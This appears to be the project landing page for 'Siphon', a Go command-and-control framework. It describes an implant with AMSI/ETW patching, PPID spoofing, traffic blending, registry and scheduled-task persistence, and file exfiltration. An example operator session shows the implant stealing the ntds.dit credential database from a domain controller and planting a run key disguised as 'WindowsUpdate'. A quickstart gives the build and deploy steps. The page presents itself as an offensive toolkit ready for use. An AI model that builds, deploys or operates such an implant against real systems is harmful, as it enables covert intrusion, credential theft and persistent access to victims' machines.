siphon — operator console

Siphon

Lightweight C2 framework with per-session forward secrecy, encrypted transport, and runtime evasion. Built in Go.

Get Started View Source
// capabilities

Encrypted C2. Zero disk footprint.

Deploy a lightweight implant on the target. Communicate over encrypted HTTPS with per-session ECDH key exchange. Exfiltrate files, execute commands, and persist — all through an interactive operator console.

🔐

Forward Secrecy

Ephemeral ECDH P-256 key exchange per session. Server public key embedded at build time — no config files on disk.

🛡

Encrypted Transport

AES-256-GCM authenticated encryption with HMAC-SHA256 message authentication covering all envelope fields.

🌐

TLS Fingerprinting

uTLS with Chrome JA3 fingerprint. Cookie-based beacon transport blends with normal HTTPS traffic.

👻

Runtime Evasion

ETW and AMSI patching on startup. PPID spoofing under explorer.exe. CREATE_NO_WINDOW for stealth.

📌

Persistence

Registry run keys, scheduled tasks, and startup folder. All methods include cleanup via unpersist commands.

💾

Encrypted Loot

Exfiltrated files encrypted at rest with AES-256-GCM. Path traversal protection on implant-controlled IDs.

Resource Limits

Max 1000 implants, 1000 results per implant, 512 KB upload chunks, 24h max sleep, input size limits.

🖥

Operator Console

Interactive CLI with Catppuccin Mocha palette. Prefix-match selection, task queuing, live results.

// in action

Operator Session

Deploy the server, catch a beacon, and interact with the implant — all from an encrypted, authenticated channel.

siphon — operator
./build/siphon-server -listen :443 -auth s3cret
[server] listening on :443 (HTTPS)
[beacon] new implant registered: d8a7822b (windows/amd64)
siphon> interact d8a7822b
[+] interacting with d8a7822b (CORP\admin@DC01)
siphon(d8a7822b)> cmd whoami
[+] task queued: e5b97d57
[submit] result from d8a7822b task=e5b97d57 success=true

┄┄┄ [ok] task=e5b97d57 ┄┄┄
corp\admin
siphon(d8a7822b)> upload C:\Windows\NTDS\ntds.dit
[+] upload task queued: ntds.dit → server (loot/d8a7822b/)
[loot] saved 16384 bytes (encrypted) → loot/d8a7822b/a3f2c1.enc
siphon(d8a7822b)> persist registry WindowsUpdate
[+] persist task queued: method=registry
registry run key added: WindowsUpdate → C:\...\OneDriveStandaloneUpdater.exe

Encrypted C2 session — per-session ECDH keys, AES-256-GCM transport.

// architecture

Three layers. Build-time config.

Shared protocol types, a beacon-loop implant with ECDH key exchange, and an operator server with encrypted loot storage. All implant configuration is baked at compile time via ldflags — the binary takes zero config files.

project layout
SRC

Project Structure

shared/
  types.go          Protocol types & HMAC auth

implant/
  main.go           Beacon loop with backoff
  comms.go          ECDH + AES-256-GCM
  transport.go      HTTPS client (uTLS)
  tasks.go          Task dispatcher
  evasion_*.go      PPID spoofing, stealth
  patches_*.go      ETW/AMSI patching
  persist_*.go      Registry, schtask, startup

server/
  handlers.go       Beacon & submit handlers
  crypto.go         Key exchange & encryption
  cli.go            Operator console
  cmd/main.go       Entry point & TLS gen
FLOW

Data Flow

┌──────────┐         ┌──────────┐
  Implant            Server  
└────┬─────┘         └────┬─────┘
                         
      HTTPS GET /beacon  
     ├──────────────────►
                         
       Encrypted Task    
     ◄──────────────────┤
                         
      HTTPS POST /submit 
     ├──────────────────►
                   ┌─────┴─────┐
                      Loot    
                    (AES-GCM) 
                   └───────────┘
Go 1.24 ECDH P-256 AES-256-GCM uTLS CGO_ENABLED=0 Cross-Platform
// tech stack

What powers Siphon

Every layer of the framework, from key exchange to operator UI, chosen for operational security and minimal footprint.

Layer Technology
Language Go 1.24.9
Crypto ECDH P-256, AES-256-GCM, HMAC-SHA256
TLS uTLS (HelloChrome_Auto)
Transport HTTPS, cookie beacon, JSON envelopes
Evasion ETW/AMSI patches, PPID spoofing
Persistence Registry, schtask, startup folder
UI Catppuccin Mocha (operator CLI)
Build Make, cross-compilation (CGO_ENABLED=0)
Testing go test -race, go vet, staticcheck
// command reference

Server flags & operator commands

Everything you need to run the server and interact with implants from the operator console.

Server Flags

Flag Default Description
-listen :443 Listen address
-cert server/certs/server.crt TLS certificate path
-key server/certs/server.key TLS private key path
-serverkey server/certs/server.pem ECDH server key path
-beacon-path /api/news Beacon endpoint URL path
-submit-path /api/submit Submit endpoint URL path
-auth (none) Pre-shared HMAC auth token
-genkey Generate ECDH keypair and exit
-gencert Generate self-signed TLS cert and exit

Operator Commands

Command Description
implants List all checked-in implants
interact <id> Select an implant to interact with
cmd <command> Execute a shell command on the active implant
upload <remote_path> Exfiltrate a file from the implant to the server
download <local> <remote> Push a file from the server to the implant
sleep <seconds> Adjust the implant beacon interval
persist <method> [name] Install persistence (registry, schtask, startup)
unpersist <method> [name] Remove persistence
selfdestruct Rename and delete the implant binary
exit-implant Instruct the implant process to exit
back Return to the main menu
tasks Show queued tasks for the active implant
results Show task results for the active implant
help Print command reference
exit Exit the operator console
// security design

Defense in depth

Every layer of the framework is designed for operational security — from ephemeral key exchange to binary hardening.

Property Implementation
Forward secrecy Ephemeral ECDH P-256 key exchange per session
Payload confidentiality AES-256-GCM authenticated encryption
Key distribution Server public key embedded at build time via ldflags
HMAC authentication HMAC-SHA256 pre-shared token covering ID, PubKey, Nonce, Ciphertext
Loot encryption Exfiltrated files encrypted at rest with AES-256-GCM
Path traversal filepath.Base() sanitization on implant-controlled IDs
Memory safety Deep-copied session keys; ECDH shared secrets zeroed after use
TLS fingerprinting uTLS with Chrome JA3 fingerprint (HelloChrome_Auto)
Resource limits Max 1000 implants, 1000 results per implant, 24h max sleep
Binary hardening Stripped with -s -w -trimpath; no debug symbols or paths
Traffic blending uTLS Chrome fingerprint, cookie-based beacon, standard HTTPS endpoints
Input limits 64 KB cookie, 1 MB response, 10 MB submit body
File permissions 0600 for all sensitive outputs
Concurrency safety sync.RWMutex and atomic operations throughout
// quickstart

Operational in 60 seconds

Generate keys, build the server and implant, deploy. Go 1.24+ and make are the only requirements.

bash
$ # Generate ECDH keypair + TLS cert
$ make setup
$ # Build the server
$ make server
$ # Build the implant
$ make implant SERVER_PK=<hex> C2_HOST=https://your-c2:443
$ # Start the server
$ ./build/siphon-server -listen :443 -auth secret
$ # Deploy implant on target, then interact:
siphon> interact abc123
siphon(abc123)> cmd whoami

make setup generates an ECDH P-256 keypair and a self-signed TLS certificate. The server public key hex is printed for embedding into implant builds.

The implant is cross-compiled for Windows by default (GOOS=windows GOARCH=amd64). Use make implant-linux for a Linux test build.

All implant configuration — C2 host, sleep interval, server public key, auth token — is baked into the binary at compile time via -ldflags -X. The implant takes zero arguments and leaves no config on disk.

The server uses HTTPS with optional HMAC authentication. Set -auth on both the server and the implant build (AUTH_TOKEN=) to enable message-level authentication.

Built for offense. Encrypted by default.